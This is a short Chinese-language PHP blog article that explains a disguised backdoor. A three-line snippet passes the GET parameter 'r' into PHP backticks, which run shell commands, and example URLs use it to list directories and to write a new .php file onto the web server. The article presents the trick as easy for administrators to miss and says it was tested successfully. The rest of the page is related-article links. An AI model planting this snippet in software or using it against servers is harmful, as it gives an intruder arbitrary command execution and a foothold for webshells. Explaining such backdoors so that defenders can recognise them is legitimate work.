首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

一个不易被发现的PHP后门代码解析

Posted in PHP onJuly 05, 2014

偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。

伪装性很好,很容易被管理员忽略。

$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),

通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://127.0.0.1/t.php?r=dir 可以列出目录

http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php

我用 appserv 和虚拟主机已经测试成功。

一个不易被发现的PHP后门代码解析

- Author -

shichen2014

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
discuz论坛 用户登录 后台程序代码
Nov 27 PHP
php写的简易聊天室代码
Jun 04 PHP
PHP全概率运算函数(优化版) Webgame开发必备
Jul 04 PHP
PHP引用符&的用法详细解析
Aug 22 PHP
php中call_user_func函数使用注意事项
Nov 21 PHP
PHP实现的sqlite数据库连接类
Dec 12 PHP
php+mysql实现无限级分类
Nov 11 PHP
判断、添加和删除WordPress置顶文章的相关PHP函数小结
Dec 10 PHP
Yii框架使用魔术方法实现跨文件调用功能示例
May 20 PHP
PHP后台实现微信小程序登录
Aug 03 PHP
PHP实现简单计算器小程序
Aug 28 PHP
总结PHP中初始化空数组的最佳方法
Feb 13 PHP
linux下使用crontab实现定时PHP计划任务失败的原因分析
Jul 05 #PHP
php操作redis中的hash和zset类型数据的方法和代码例子
Jul 05 #PHP
采用memcache在web集群中实现session的同步会话
Jul 05 #PHP
30个php操作redis常用方法代码例子
Jul 05 #PHP
PHP在网页中动态生成PDF文件详细教程
Jul 05 #PHP
PHP数组遍历知识汇总(包含遍历方法、数组指针操作函数、数组遍历测速)
Jul 05 #PHP
php遍历数组的4种方法总结
Jul 05 #PHP
apt命令(1) 解密(1) hashlib(1) 加密(1) requests(1) hmac(1) openpyxl(1) logging(1) 面向对象(3) Pickle(1)
You might like
php实现的简单压缩英文字符串的代码
2008/04/24 PHP
paypal即时到账php实现代码
2010/11/28 PHP
PHP中strncmp()函数比较两个字符串前2个字符是否相等的方法
2016/01/07 PHP
Laravel学习教程之View模块详解
2017/09/18 PHP
PHP vsprintf()函数格式化字符串操作原理解析
2020/07/14 PHP
如何让浏览器支持jquery ajax load 前进、后退功能
2014/06/12 Javascript
jQuery提示插件alertify使用指南
2015/04/21 Javascript
JavaScript中的原型prototype属性使用详解
2015/06/05 Javascript
ajax如何实现页面局部跳转与结果返回
2015/08/24 Javascript
JS插件overlib用法实例详解
2015/12/26 Javascript
javascript实现下雪效果【实例代码】
2016/05/03 Javascript
jQuery简单实现彩色云标签效果示例
2016/08/01 Javascript
Javascript将字符串日期格式化为yyyy-mm-dd的方法
2016/10/27 Javascript
详解jQuery的表单验证插件--Validation
2016/12/21 Javascript
获取当前月(季度/年)的最后一天(set相关操作及应用)
2016/12/27 Javascript
JS实现的Unicode编码转换操作示例
2017/04/28 Javascript
详解ES6之async+await 同步/异步方案
2017/09/19 Javascript
vue-dplayer 视频播放器实例代码
2019/11/08 Javascript
create-react-app中添加less支持的实现
2019/11/15 Javascript
Vue实现Layui的集成方法步骤
2020/04/10 Javascript
原生JS实现音乐播放器的示例代码
2021/02/25 Javascript
[01:06]DOTA2亚洲邀请赛专属珍藏-荧煌之礼
2017/03/24 DOTA
Python实用技巧之列表、字典、集合中根据条件筛选数据详解
2018/07/11 Python
Python requests HTTP验证登录实现流程
2020/11/05 Python
Keras保存模型并载入模型继续训练的实现
2021/02/20 Python
CSS3实现多背景展示效果通过CSS3定位多张背景
2014/08/10 HTML / CSS
美国著名手表网站:Timepiece
2017/11/15 全球购物
Watchshop德国:欧洲在线手表No.1
2019/06/20 全球购物
最新教师自我评价分享
2013/11/12 职场文书
我的动漫时代的创业计划书范文
2014/01/27 职场文书
优秀公益广告词大全
2014/03/19 职场文书
自我检讨报告
2015/01/28 职场文书
2015年文秘个人工作总结
2015/10/14 职场文书
辞职信怎么写?你都知道吗?
2019/06/24 职场文书
嵌入式Redis服务器在Spring Boot测试中的使用教程
2021/07/21 Redis
mysql字段为NULL索引是否会失效实例详解
2022/05/30 MySQL